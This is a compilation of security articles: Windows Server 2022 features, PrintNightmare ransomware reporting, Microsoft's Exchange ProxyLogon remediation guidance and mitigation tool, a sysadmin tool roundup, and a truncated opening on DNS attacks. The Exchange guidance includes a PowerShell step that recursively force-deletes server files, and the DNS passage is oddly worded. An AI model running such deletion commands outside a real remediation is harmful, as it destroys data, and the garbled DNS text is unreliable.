What’s new in Windows Server 2022

This article describes some of the new features in Windows Server 2022. Windows Server 2022 is built on the strong foundation of Windows Server 2019 and brings many innovations on three key themes: security, Azure hybrid integration and management, and application platform. Also, Windows Server 2022 Datacenter: Azure Edition helps you use the benefits of cloud to keep your VMs up to date while minimizing downtime.

Security

The new security capabilities in Windows Server 2022 combine other security capabilities in Windows Server across multiple areas to provide defense-in-depth protection against advanced threats. Advanced multi-layer security in Windows Server 2022 provides the comprehensive protection that servers need today.

Secured-core server

Secured-core server provides protections that are useful against sophisticated attacks and can provide increased assurance when handling mission critical data in some of the most data sensitive industries. It is built on three key pillars: simplified security, advanced protection, and preventative defense.

Simplified security

When you buy hardware from an OEM for Secured-core server, you have assurance that the OEM has provided a set of hardware, firmware, and drivers that satisfy the Secured-core promise. Windows Server systems will have easy configuration experiences in the Windows Admin Center to enable the security features of Secured-core.

Advanced protection

Secured-core servers use hardware, firmware, and operating system capabilities to the fullest extent to provide protection against current and future threats. The protections enabled by a Secured-core server are targeted to create a secure platform for critical applications and data used on that server. The Secured-core functionality spans the following areas:

  • Hardware root-of-trustTrusted Platform Module 2.0 (TPM 2.0) come standard with servers capable of using Secured-core servers. TPM 2.0 provides a secure store for sensitive keys and data, such as measurements of the components loaded during boot. This hardware root-of-trust raises the protection provided by capabilities like BitLocker, which uses TPM 2.0 and facilitates creating attestation-based workflows that can be incorporated into zero-trust security strategies.
  • Firmware protectionThere is a clear rise in security vulnerabilities being reported in the firmware space given the high privileges that firmware runs with and the relative opacity of what happens in firmware to traditional anti-virus solutions. Recent reports show that malware and ransomware platforms are adding firmware capabilities raising the risk of firmware attacks that have already been seen targeting enterprise resources like Active Directory domain controllers. Using processor support for Dynamic Root of Trust of Measurement (DRTM) technology, along with DMA protection, Secured-core systems isolate the security critical hypervisor from attacks such as this.
  • Virtualization-based security (VBS)Secured-core servers support VBS and hypervisor-based code integrity (HVCI). VBS and HVCI protect against the entire class of vulnerabilities used in cryptocurrency mining attacks given the isolation VBS provides between the privileged parts of the operating system such as the kernel and the rest of the system. VBS also provides more capabilities that customers can enable, such as Credential Guard, which better protects domain credentials.

Preventative defense

Enabling Secured-core functionality helps proactively defend against and disrupt many of the paths attackers may use to exploit a system. This set of defenses also enables IT and SecOps teams better utilize their time across the many areas that need their attention.

Secure connectivity

Transport: HTTPS and TLS 1.3 enabled by default on Windows Server 2022

Secure connections are at the heart of today’s interconnected systems. Transport Layer Security (TLS) 1.3 is the latest version of the internet’s most deployed security protocol, which encrypts data to provide a secure communication channel between two endpoints. HTTPS and TLS 1.3 is now enabled by default on Windows Server 2022, protecting the data of clients connecting to the server. It eliminates obsolete cryptographic algorithms, enhances security over older versions, and aims to encrypt as much of the handshake as possible. Learn more about supported TLS versions and about supported cipher suites.

Secure DNS: Encrypted DNS name resolution requests with DNS-over-HTTPS

DNS Client in Windows Server 2022 now supports DNS-over-HTTPS (DoH) which encrypts DNS queries using the HTTPS protocol. This helps keep your traffic as private as possible by preventing eavesdropping and your DNS data being manipulated. Learn more about configuring the DNS client to use DoH.

Server Message Block (SMB): SMB AES-256 encryption for the most security conscious

Windows Server now supports AES-256-GCM and AES-256-CCM cryptographic suites for SMB encryption and signing. Windows will automatically negotiate this more advanced cipher method when connecting to another computer that also supports it, and it can also be mandated through Group Policy. Windows Server still supports AES-128 for down-level compatibility.

SMB: East-West SMB encryption controls for internal cluster communications

Windows Server failover clusters now support granular control of encrypting and signing intra-node storage communications for Cluster Shared Volumes (CSV) and the storage bus layer (SBL). This means that when using Storage Spaces Direct, you can decide to encrypt or sign east-west communications within the cluster itself for higher security.

SMB over QUIC

SMB over QUIC updates the SMB 3.1.1 protocol in Windows Server 2022 Datacenter: Azure Edition and supported Windows clients to use the QUIC protocol instead of TCP. By using SMB over QUIC along with TLS 1.3, users and applications can securely and reliably access data from edge file servers running in Azure. Mobile and telecommuter users no longer need a VPN to access their file servers over SMB when on Windows. More information can be found at the SMB over QUIC documentation.

Azure hybrid capabilities

You can increase your efficiency and agility with built-in hybrid capabilities in Windows Server 2022 that allow you to extend your data centers to Azure more easily than ever before.

Azure Arc enabled Windows Servers

Azure Arc enabled servers with Windows Server 2022 brings on-premises and multi-cloud Windows Servers to Azure with Azure Arc. This management experience is designed to be consistent with how you manage native Azure virtual machines. When a hybrid machine is connected to Azure, it becomes a connected machine and is treated as a resource in Azure. More information can be found at the Azure Arc enables servers documentation.

Windows Admin Center

Improvements to Windows Admin Center to manage Windows Server 2022 include capabilities to both report on the current state of the Secured-core features mentioned above, and where applicable, allow customers to enable the features. More information on these and many more improvements to Windows Admin Center can be found at the Windows Admin Center documentation.

Azure Automanage – Hotpatch

Hotpatch, part of Azure Automanage, is supported in Windows Server 2022 Datacenter: Azure Edition. Hotpatching is a new way to install updates on new Windows Server Azure Edition virtual machines (VMs) that doesn’t require a reboot after installation. More information can be found at the Azure Automanage documentation.

Application platform

There are several platform improvements for Windows Containers, including application compatibility and the Windows Container experience with Kubernetes. A major improvement includes reducing the Windows Container image size by up to 40%, which leads to a 30% faster startup time and better performance.

You can now also run applications that depend on Azure Active Directory with group Managed Services Accounts (gMSA) without domain joining the container host, and Windows Containers now support Microsoft Distributed Transaction Control (MSDTC) and Microsoft Message Queuing (MSMQ).

There are several other enhancements that simplify the Windows Container experience with Kubernetes. These enhancements include support for host-process containers for node configuration, IPv6, and consistent network policy implementation with Calico.

In addition to platform improvements, Windows Admin Center has been updated to make it easy to containerize .NET applications. Once the application is in a container, you can host it on Azure Container Registry to then deploy it to other Azure services, including Azure Kubernetes Service.

With support for Intel Ice Lake processors, Windows Server 2022 supports business-critical and large-scale applications, such as SQL Server, that require up to 48 TB of memory and 2,048 logical cores running on 64 physical sockets. Confidential computing with Intel Secured Guard Extension (SGX) on Intel Ice Lake improves application security by isolating applications from each other with protected memory.

You can read more about these and other improvements at What’s new for Windows Containers in Windows Server 2022.

Other key features

Nested virtualization for AMD processors

Nested virtualization is a feature that allows you to run Hyper-V inside of a Hyper-V virtual machine (VM). Windows Server 2022 brings support for nested virtualization using AMD processors, giving more choices of hardware for your environments. More information can be found at the nested virtualization documentation.

Microsoft Edge browser

Microsoft Edge is included with Windows Server 2022, replacing Internet Explorer as the default browser. It is built on Chromium open source and backed by Microsoft security and innovation. It can be used with Server Core or Server with Desktop Experience installation options, and supports HTTP/3 which uses the QUIC protocol. More information can be found at the Microsoft Edge Enterprise documentation. Note that Microsoft Edge, unlike the rest of Windows Server, follows the Modern Lifecycle for its support lifecycle. For details, see Microsoft Edge lifecycle documentation.

Storage

Storage Migration Service

Enhancements to Storage Migration Service in Windows Server 2022 makes it easier to migrate storage to Windows Server or to Azure from more source locations. Here are the features that are available when running the Storage Migration Server orchestrator on Windows Server 2022:

  • Migrate local users and groups to the new server.
  • Migrate storage from failover clusters, migrate to failover clusters, and migrate between standalone servers and failover clusters.
  • Migrate storage from a Linux server that uses Samba.
  • More easily sync migrated shares into Azure by using Azure File Sync.
  • Migrate to new networks such as Azure.
  • Migrate NetApp CIFS servers from NetApp FAS arrays to Windows servers and clusters.

Adjustable storage repair speed

User adjustable storage repair speed is a new feature in Storage Spaces Direct that offers more control over the data resync process by allocating resources to either repair data copies (resiliency) or run active workloads (performance). This helps improve availability and allows you to service your clusters more flexibly and efficiently.

Storage bus cache with Storage Spaces on standalone servers

Storage bus cache is now available for standalone servers. It can significantly improve read and write performance, while maintaining storage efficiency and keeping the operational costs low. Similar to its implementation for Storage Spaces Direct, this feature binds together faster media (for example, NVMe or SSD) with slower media (for example, HDD) to create tiers. A portion of the faster media tier is reserved for the cache. To learn more, see Enable storage bus cache with Storage Spaces on standalone servers.

SMB compression

Enhancement to SMB in Windows Server 2022 and Windows 11 allows a user or application to compress files as they transfer over the network. Users no longer have to manually zip files in order to transfer much faster on slower or more congested networks. For details, see SMB Compression.

Source :
https://docs.microsoft.com/en-us/windows-server/get-started/whats-new-in-windows-server-2022

Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities

Ransomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim’s network to deploy file-encrypting payloads on targeted systems.

“Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,” Cisco Talos said in a report published Thursday, corroborating an independent analysis from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.

While Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. The attacks are said to have taken place since at least July 13.

Since June, a series of “PrintNightmare” issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations –

  • CVE-2021-1675 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)
  • CVE-2021-34527 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)
  • CVE-2021-34481 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
  • CVE-2021-36936 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
  • CVE-2021-36947 – Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)
  • CVE-2021-34483 – Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)
  • CVE-2021-36958 – Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)

CrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.

Vice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege escalation.

Specifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.

“Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,” the researchers said. “The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.”

Source :
https://thehackernews.com/2021/08/ransomware-gangs-exploiting-windows.html

Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities

MSRC / By MSRC Team / March 16, 2021

This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.

Mitigating these vulnerabilities and investigating whether an adversary has compromised your environment should be done in parallel. Applying the March 2021 Exchange Server Security Updates is critical to prevent (re)infection, but it will not evict an adversary who has already compromised your server. Based on your investigation, remediation may be required. This guide will help you answer these questions:

Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks. We will update this guidance with new details and recommendations as we continue to expand our knowledge of these threats and the threat actors behind them, so come back to this page for updates.

How does the attack work?

Microsoft released security updates for four different on premises Microsoft Exchange Server zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065). These vulnerabilities can be used in combination to allow unauthenticated remote code execution on devices running Exchange Server. Microsoft has also observed subsequent web shell implantation, code execution, and data exfiltration activities during attacks. This threat may be exacerbated by the fact that numerous organizations publish Exchange Server deployments to the internet to support mobile and work-from-home scenarios.

In many of the observed attacks, one of the first steps attackers took following successful exploitation of CVE-2021-26855, which allows unauthenticated remote code execution, was to establish persistent access to the compromised environment via a web shell. A web shell is a piece of malicious code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow adversaries to execute commands and to steal data from a web server or use the server as launch pad for further attacks against the affected organization. Therefore, it is critical to not only immediately mitigate the vulnerabilities, but also remove any additional backdoors, such as web shells that attackers may have created.

Am I vulnerable to this threat?

If you are running Exchange Server 2010, 2013, 2016, or 2019 you must apply the March 2021 Security Update to protect yourself against these threats.

To determine if your Exchange Servers are vulnerable to this attack, the following methods can be used:

  • Using Microsoft Defender for Endpoint
  • Scanning your Exchange servers using Nmap

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers can use the threat analytics article in Microsoft 365 security center to understand their risk. This requires your Exchange Servers to be onboarded to Microsoft Defender for Endpoint. See instructions for onboarding servers that are not currently monitored.

Scanning using Nmap script

For servers not onboarded to Microsoft Defender for Endpoint, use this Nmap script to scan a URL/IP to determine vulnerability: http-vuln-cve2021-26855.nse.

How do I mitigate the threat?

The best and only complete mitigation for these threats is to update to a supported version of Exchange Server and ensure it is fully updated. If it’s not possible to immediately move to the current Exchange Server Cumulative Update and apply security updates, additional strategies for mitigation are provided below. These lesser mitigation strategies are only a temporary measure while you install the latest Cumulative Update and Security Updates.

Immediate temporary mitigations

The following mitigation options can help protect your Exchange Server until the necessary Security Updates can be installed. These solutions should be considered temporary, but can help enhance safety while additional mitigation and investigation steps are being completed.

  • Run EOMT.ps1 (Recommended) – The Exchange On-premises Mitigation Tool (EOMT.ps1) mitigates CVE-2021-26855 and attempts to discover and remediate malicious files. When run, it will first check if the system is vulnerable to CVE-2021-26855 and, if so, installs a mitigation for it. It then automatically downloads and runs Microsoft Safety Scanner (MSERT). This is the preferred approach when your Exchange Server has internet access.
  • Run ExchangeMitigations.ps1 – The ExchangeMitigations.ps1 script applies mitigations but doesn’t perform additional scanning. This is an option for Exchange Servers without internet access or for customers who do not want Microsoft Safety Scanner to attempt removing malicious activity it finds.

Applying the current Exchange Server Cumulative Update

The best, most complete mitigation is to get to a current Cumulative Update and apply all Security Updates. This is the recommended solution providing the strongest protection against compromise.

Apply security hotfixes to older Cumulative Updates

To assist organizations that may require additional time and planning to get to a supported Cumulative Update, security hotfixes have been made available. It’s important to note that applying these security hotfixes to older Cumulative Updates will mitigate against these specific Exchange vulnerabilities, but it will not address other potential security risks your Exchange Server may be vulnerable to. This approach is only recommended as a temporary solution while you move to a supported Cumulative Update.

Isolation of your Exchange Server

To reduce the risk of exploitation of the vulnerabilities, the Exchange Server can be isolated from the public internet by blocking inbound connections over port 443.

  • Blocking port 443 from receiving inbound internet traffic provides temporary protection until Security Updates can be applied, but it reduces functionality as it could inhibit work-from-home or other non-VPN remote work scenarios and does not protect against adversaries who may already be present in your internal network.
  • The most comprehensive way to complete this is to use your perimeter firewalls that are currently routing inbound 443 traffic to block this traffic. You can use Windows Firewall to accomplish this, but you will have to remove all inbound 443 traffic rules prior to blocking the traffic.

Have I been compromised?

To determine if your Exchange Servers have been compromised due to these vulnerabilities, multiple options have been made available:

  • Microsoft Defender for Endpoint
  • Publicly available tools published by Microsoft

If Microsoft Defender for Endpoint is not running, skip directly to the publicly available tools section. If it is running, we recommend that you follow both methods.

Microsoft Defender for Endpoint

  • Check the threat analytics article in Microsoft 365 security center to determine if any indications of exploitation are observed. The Analyst report tab in the Microsoft 365 Security Center threat analytics article contains a continuously updated detailed description of the threat, actor, exploits, and TTPs. On the Overview page, the Impacted assets section lists all impacted devices. The Related incidents section shows any alerts for detected exploitation or post-exploitation activity.
  • If you have devices that are flagged as impacted (see Impacted assets section) and have active alerts and incidents, click the incidents to further understand the extent of the attack.
  • Microsoft Defender for Endpoint blocks multiple components of this threat and has additional detections for associated malicious behaviors. These are raised as alerts in the Microsoft Defender Security Center. Additionally, Microsoft Defender for Endpoint prevents some critical behaviors observed in attacks, such as attempts to exploit the CVE-2021-27065 post-authentication file-write vulnerability that can be combined with CVE-2021-26855 to elevate privileges.
  • Microsoft Defender for Endpoint also detects post-exploitation activity, including some techniques that attackers use to maintain persistence on the machine. Note that alerts marked “Blocked” indicate that the detected threat is also remediated. Alerts marked “Detected” require security analyst review and manual remediation.

Publicly available tools published by Microsoft

The following tools have been made available by Microsoft to aid customers in investigating whether their Microsoft Exchange Servers have been compromised. We recommend customers to run both tools as part of their investigation:

Exchange On-Premises Mitigation Tool

Download and run EOMT.ps1 as an administrator on your Exchange Server to automatically run the latest version of Microsoft Safety Scanner (MSERT). MSERT discovers and remediates web shells, which are backdoors that adversaries use to maintain persistence on your server.

  • After completing the scan, EOMT.ps1 reports any malicious files it discovers and removes. If malicious files are discovered and removed by the tool, follow the web shell remediation workflow. If no malicious files are found, it will report “No known threats detected.”
  • If this initial scan does not find evidence of malicious files, a full scan can be run via “.\EOMT.ps1 -RunFullScan”. This may take a few hours or days, depending on your environment and the number of files on the Exchange Server.
  • If the script is unable to download Microsoft Safety Scanner (MSERT), you can download and copy MSERT manually to your Exchange Server. Run this executable directly as an administrator. Follow the on-screen instructions to run a Quick or Full scan. A new version of MSERT should be downloaded each time it is run to ensure it contains the latest protections

Test-ProxyLogon.ps1

Run the Test-ProxyLogon.ps1 script as administrator to analyze Exchange and IIS logs and discover potential attacker activity.

IMPORTANT: We recommend re-downloading this tool at a minimum of once per day if your investigation efforts span multiple days, as we continue to make updates to improve its usage and output.

Step 1 – Review script output to determine risk:

  • If the script does not find attacker activity, it outputs the message Nothing suspicious detected
  • If attacker activity was found, the script reports the vulnerabilities for which it found evidence of use and collects logs that it stores in the specified output path in the Test-ProxyLogonLogs directory. Continue following these steps for remediation. Below is an example of the output:

Step 2 – Investigate CVE-2021-27065:

  • If CVE-2021-27065 is detected, then investigate the logs specified for lines containing Set-OabVirtualDirectory. This indicates that a file was written to the server.
  • Investigate web server directories for new or recently modified .aspx files or other file types that may contain unusual <script> blocks.
    • This indicates an adversary may have dropped a web shell file. Below is an example of such a <script> block.
    • If yes, continue to continue to the web shell remediation workflow.

Step 3 – Investigate CVE-2021-26857:

  • If CVE-2021-26857 is detected, then investigate the collected logs labeled <servername>Cve-2021-26857.csv.

Step 4 – Investigate CVE-2021-26858:

  • If CVE-2021-26858 is detected, then investigate the collected logs labeled <servername>Cve-2021-26858.log.
  • Does the tool output any path other than *\Microsoft\ExchangeServer\V15\ClientAccess\OAB\Temp\*?

Step 5 – Investigate CVE-2021-26855:

  • If CVE-2021-26855 is detected, then investigate the collected logs labeled <servername>Cve-2021-26855.csv.
  • Does the tool output for AnchorMailbox contain Autodiscover.xml ONLY?
    • This indicates an attacker is scanning your infrastructure as a precursor to additional compromise.
    • If yes, continue to the scan remediation workflow.
  • Does the tool output for AnchorMailbox contain /ews/exchange.asmx?
    • This indicates an attacker may be exfiltrating your email.
    • If yes, inspect the Exchange web services (EWS) logs in \V15\Logging\EWS to verify if the adversary accessed a mailbox, and then proceed to the corresponding remediation workflow.

What remediation steps should I take?

  • The steps in Have I been compromised? section help establish the scope of possible exploitation: scanning, unauthorized email access, establishment of persistence via web shells, or post-exploitation activity.
    • Decide between restoring your Exchange Server or moving your mail services to the cloud. You can engage with FastTrack for data migration assistance for Office 365 customers with tenants of 500+ eligible licenses.
  • Follow applicable remediation workflows:
    • Was post-compromise activity related to credential harvesting or lateral movement detected by Microsoft Defender for Endpoint or during manual investigation?
      • Engage your incident response plan. Share the investigation details to your incident response team.
      • If you are engaging with CSS Security or Microsoft Detection and Response Team (DART), and you are a Microsoft Defender for Endpoint customer, see instructions for onboarding Windows Server to Microsoft Defender for Endpoint.
    • Were web shells detected?
      • Clean and restore your Exchange Server:
        • Preserve forensic evidence if your organization requires evidence preservation.
        • Disconnect the Exchange Server from the network, either physically or virtually via firewall rules.
        • Restart Exchange Server.
        • Stop W3WP services.
        • Remove any malicious ASPX files identified via the investigation steps above.
        • Delete all temporary ASP.NET files on the system using the following script:

iisreset /stop
$tempAspDir = "$env:Windir\Microsoft.NET\Framework64\$([System.Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion())\Temporary ASP.NET Files"
mkdir 'C:\forensicbackup'
Copy-Item -Recurse -Path $tempAspDir -Destination 'C:\forensicbackup'
rm -r -Force $tempAspDir
iisreset /start

  • Was mailbox access and exfiltration detected?
    • Disconnect Exchange Server from the network.
    • Apply Security Updates.
    • Run a full EOMT.ps1 scan via “.\EOMT.ps1 -RunFullScan”. Have I been compromised? for additional instructions for running EOMT.ps1.
    • Resume operation.
  • Was scan-only adversary behavior detected?
    • Disconnect Exchange Server from the network.
    • Apply Security Updates.
    • Resume operation.

How can I better protect myself and monitor for suspicious activity?

  • Additional protection and investigation capabilities are available if Microsoft Defender Antivirus and Microsoft Defender for Endpoint are running on the Exchange Server. If neither are yet installed, installing both now can provide additional protection moving forward and is strongly advised.
  • If you are an existing Microsoft Defender for Endpoint customer but have Exchange servers that are not onboarded, see instructions for onboarding Windows Server to Microsoft Defender for Endpoint.
  • If you are not an existing Microsoft Defender for Endpoint customer, Microsoft is making publicly available a 90-day Microsoft Defender for Endpoint trial offer exclusively to support commercial on-premises Exchange Server customers that require continuous investigation and additional post-compromise security event detection beyond what MSERT offers. Next, follow the steps for setting up Microsoft Defender for Endpoint and onboarding your Exchange Server.

Microsoft’s Detection and Response Team (DART) 
Microsoft 365 Defender Team

CSS Security Incident Response

This blog and its contents are subject to the Microsoft Terms of Use.  All code and scripts are subject to the applicable terms on Microsoft’s GitHub Repository (e.g., the MIT License).

Source :
https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/

One-Click Microsoft Exchange On-Premises Mitigation Tool – March 2021

MSRC / By MSRC Team / March 15, 2021 / CVE-2021-26855CVE-2021-26857CVE-2021-26858CVE-2021-27065partial mitigations

We have been actively working with customers through our customer support teams, third-party hosters, and partner network to help them secure their environments and respond to associated threats from the recent Exchange Server on-premises attacks. Based on these engagements we realized that there was a need for a simple, easy to use, automated solution that would meet the needs of customers using both current and out-of-support versions of on-premises Exchange Server.

Microsoft has released a new, one-click mitigation tool, Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.

By downloading and running this tool, which includes the latest Microsoft Safety Scanner, customers will automatically mitigate CVE-2021-26855 on any Exchange server on which it is deployed. This tool is not a replacement for the Exchange security update but is the fastest and easiest way to mitigate the highest risks to internet-connected, on-premises Exchange Servers prior to patching.
We recommend that all customers who have not yet applied the on-premises Exchange security update:

  • Download this tool.
  • Run it on your Exchange servers immediately.
  • Then, follow the more detailed guidance here to ensure that your on-premises Exchange is protected.
  • If you are already using Microsoft Safety Scanner, it is still live and we recommend keeping this running as it can be used to help with additional mitigations.

Once run, the Run EOMT.ps1 tool will perform three operations:

Mitigate against current known attacks using CVE-2021-26855 using a URL Rewrite configuration.
Scan the Exchange Server using the Microsoft Safety Scanner.
Attempt to reverse any changes made by identified threats.

Before running the tool, you should understand:

  • The Exchange On-premises Mitigation Tool is effective against the attacks we have seen so far, but is not guaranteed to mitigate all possible future attack techniques. This tool should only be used as a temporary mitigation until your Exchange servers can be fully updated as outlined in our previous guidance.
  • We recommend this script over the previous ExchangeMitigations.ps1 script as it tuned based on the latest threat intelligence. If you have already started with the other script, it is fine to switch to this one.
  • This is a recommended approach for Exchange deployments with Internet access and for those who want to attempt automated remediation.
  • Thus far, we have not observed any impact to Exchange Server functionality when these mitigation methods are deployed.

For more technical information, examples, and guidance please review the GitHub documentation.

Microsoft is committed to helping customers and will continue to offer guidance and updates that can be found at https://aka.ms/exchangevulns.

MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS GUIDANCE. The Exchange On-premises Mitigation Tool is available through the MIT License, as indicated in the GitHub Repository where it is offered.

Source :
https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/

The Top Free Tools for Sysadmins in 2021

It’s no secret that sysadmins have plenty on their plates. Managing, troubleshooting, and updating software or hardware is a tedious task. Additionally, admins must grapple with complex webs of permissions and security. This can quickly become overwhelming without the right tools.

If you’re a sysadmin seeking to simplify your workflows, you’re in luck. We’ve gathered some excellent software picks to help tackle different duties more efficiently.

Thankfully, these free tools are also respectful of tight budgets—without sacrificing core functionality.

Best for Permissions Management: SolarWinds Permissions Analyzer for Active Directory

Whether you are part of an organization with many members or numerous resources, keeping track of permissions can be challenging. Changes in responsibilities, titles, or even employment statuses can influence one’s access to proprietary data. Each user has unique privileges.

We not only need to visualize these but manage them on a case-by-case basis. Previously, this would require a deep, tedious dive into file systems, shares, and AD groups.

SolarWinds Permissions Analyzer streamlines this process. Once the software has system access, you may inspect user permissions using the search bars. This lets you cross-reference specific users with key file groups—showing read access, write or modify access, delete or create capabilities, and even full control.

How does Permissions Analyzer (PA) check this?

  1. The tool performs a user search
  2. PA reads NTFS rights and calculates NTFS permissions
  3. PA then reads membership information for any pertinent groups
  4. PA searches for local group membership information
  5. The program reads share rights, calculating share permissions
  6. Finally, results are merged and finalized

This process is incredibly quick. Referring to the figure above, the way SolarWinds displays this information is its bread and butter. Permissions Analyzer organizes the output into a hierarchical table—including expandable categories based on inheritance. For instance, you can see if group membership impacts specific permissions statuses.

This information is shown in concert with NTFS, Shares, and Total permissions. The GUI allows for quick consumption using iconography and color (partially adopting the traffic light scheme). Therefore, PA excels where alternatives fall short: simplicity and usability.

Note that SolarWinds Permissions Analyzer is an investigative tool. It doesn’t allow you to edit permissions within the app; however, it provides rapid visibility into your permissions structure.

Best for Boosting Password Security: Specops Password Auditor

Active Directory password security is vitally important, yet many organizations routinely fail short. Teams can institute password policies—both broad and fine-grained. But, are these efforts adequate? Specops Password Auditor can answer that question and more for you.

Password Auditor does what its namesake implies by scanning all user accounts within your environment to detect leaked passwords. Specops maintains a dictionary of compromised passwords; should any user passwords match, Password Auditor highlights them within the tool.

The central dashboard displays the following in a unified view:

  • Breached passwords (and their corresponding users)
  • Identical passwords (and matching users)
  • Admin account names and stale variants
  • Accounts with expired passwords
  • Various password policies according to users, roles, and security
  • Password policy usage and compliance (pass, caution, fail)

This breakdown is easier to read at a glance than most others out there—including some paid options. It’s also a great supplement to Azure AD Password Protection. While that functionally applies password policies to domain controllers, Password Auditor determines if these policies are ultimately working properly.

Are dormant accounts causing issues? Perhaps password length and complexity aren’t up to snuff. Password Auditor can shed light on these issues.

Like SolarWinds Permissions Analyzer, Specops’ tool conducts a scan of your users and policies. This process is quick and easy to monitor. Password Auditor automatically compiles a report of its findings, which is available as a downloadable PDF. You may also export to CSV.

Next, you can measure your policies against standards set by NIST, PCI, Microsoft, and SANS. It’s even easy to test your policies against brute-force attacks. This promotes adherence to best practices.

Worried about potential tampering? Specops Password Auditor is a read-only program.

Best for Network Visibility and Protocol Analysis: Wireshark

For lovers of the now-deprecated Microsoft Message Analyzer, Wireshark has emerged as a popular replacement. The multi-platform tool supports an expansive list of operating systems:

  • Windows 8+ and Windows Server 2012(R)+
  • macOS 10.12+
  • Over a dozen versions of UNIX, Linux, and BSD

Wireshark can inspect hundreds of network protocols, and even when that list is continually evolving. Accordingly, Wireshark can capture data whether you’re online or offline, allowing for uninterrupted inspection. Wireshark also supports over 20 capture file formats.

You may retrospectively parse logs using your preferred interface—whether that be the GUI or the TShark terminal utility. Files compressed using gzip can be uncompressed on the fly, which saves time.

Want to inspect the packets traveling throughout your network? Simply take advantage of the three-pane browser view, which keeps data well organized. Layouts also feature collapsible sections—letting you reveal additional details on demand or keep the interface uncluttered.

What else does Wireshark offer?

  • Numerous display filters
  • VoIP analysis
  • Real-time data reads over ethernet, IEEE, Bluetooth, USB, token ring, and more
  • Decryption for IPsec, Kerberos, SNMP, ISAKMP, SSL/TLS, WEP, WPA, and WPA2
  • Customizable coloring rules
  • Easy data export via XML, PostScript, CSV, or plain text

Wireshark remains open source to this day, and the developers maintain high-quality documentation on Wireshark’s website and GitHub pages.

Best for Proactive User-Password Management: Specops Password Notification Email

Even when your password policy is sound, it’s important to keep passwords from becoming stale. This can prevent hackers from gaining repeat access to a compromised account over the long term.

Unanticipated expiry can also separate users from vital resources. Accordingly, companies enforcing periodic password expiry should look no further than Specops Password Notification.

Password Notification’s premise is pretty simple: prevent a lockout, thwart unwanted access, and keep users connected from afar. Additionally, the goal is to lessen the burden on help desk technicians and universally prevent frustration. How exactly does the tool work?

  • The pwdLastSet attribute is compared to the maximum password age. This age is outlined in a given domain policy or fine-grained password policy
  • Users impacted by relevant GPOs are sent notification emails when their password nears expiry. This warning period, message, and subject are customizable
  • IT admins can communicate with all users—even those on remote networks or VPNs

Regular Windows users don’t receive these alerts when they’re off the network.

How else can you tailor emails in Password Notification? Email frequency is adjustable, as are recipients (including multiple contacts). You can also set priority levels that change dynamically as deadlines approach. Seamless time zone integrations are also available.

Manual methods might otherwise rely on scripting via PowerShell. Specops’ tool gives users rich functionality out of the box, without the need for heavy configuration.

Source :
https://thehackernews.com/2021/02/the-top-free-tools-for-sysadmins-in-2021.html

Top 10 Dangerous DNS Attacks Types and The Prevention Measures

From the above topic, we can guess that today, we are going to discuss the top 10 DNS attacks and how to mitigate them. DNS stands for Domain Name System which remains under constant attacks, and thus we can assume there is no end in sight because the threats are growing increasingly nowadays.

DNS generally uses UDP fundamentally and in some cases, uses TCP as well. When it uses the UDP protocol, which is connectionless and can be tricked easily.

Thus DNS protocol is remarkably popular as a DDoS tool, and DNS, recognized as the internet’s phonebook, which is a component of the global internet foundation that transmutes between well-known names and the number that a computer needed to enter a website and send an email.

DNS has long been the target of attackers looking to take all custom of corporate and secret data, hence, the warnings in the past year indicate a worsening of the condition.

As per the IDC’s research, the average costs correlated with a DNS mugging rose by 49% associated with a year earlier. However, in the U.S., the average price of a DNS attack trims out at more than $1.27 million.

Approximately half of the respondents (48%) state that wasting more than $500,000 to a DNS attack, and about 10% say that they lost more than $5 million on each break. In extension, the preponderance of U.S. companies says that it needed more than one day to determine a DNS attack.

